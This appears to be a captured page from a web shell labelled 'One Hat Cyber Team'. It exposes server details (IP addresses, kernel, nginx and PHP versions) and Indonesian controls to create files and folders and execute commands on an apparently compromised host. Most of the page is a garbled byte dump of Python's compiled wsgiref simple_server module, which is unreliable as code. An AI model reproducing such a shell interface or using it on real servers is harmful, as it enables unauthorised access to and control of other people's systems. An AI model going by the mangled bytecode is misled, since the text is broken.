⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.10
/
wsgiref
/
__pycache__
/
View File Name :
simple_server.cpython-310.pyc
o }5h3 @ s4 d Z ddlmZmZ ddlZddlZddlmZ ddl m Z dZg dZde Z e d ej d Ze d e ZG dd deZG d d deZG dd deZdd ZeefddZedkredde'Zej Zeded ded d ddlZed e W d dS 1 sw Y dS dS )a! BaseHTTPServer that implements the Python WSGI protocol (PEP 3333) This is both an example of how WSGI can be implemented, and a basis for running simple web applications on a local machine, such as might be done when testing or debugging an application. It has not been reviewed for security issues, however, and we strongly recommend that you use a "real" web server for production use. For example usage, see the 'if __name__=="__main__"' block at the end of the module. See also the BaseHTTPServer module docs for other API information. )BaseHTTPRequestHandler HTTPServerN) SimpleHandler)python_implementationz0.2) WSGIServerWSGIRequestHandlerdemo_appmake_serverWSGIServer// c @ s e Zd ZeZdd ZdS ) ServerHandlerc C s<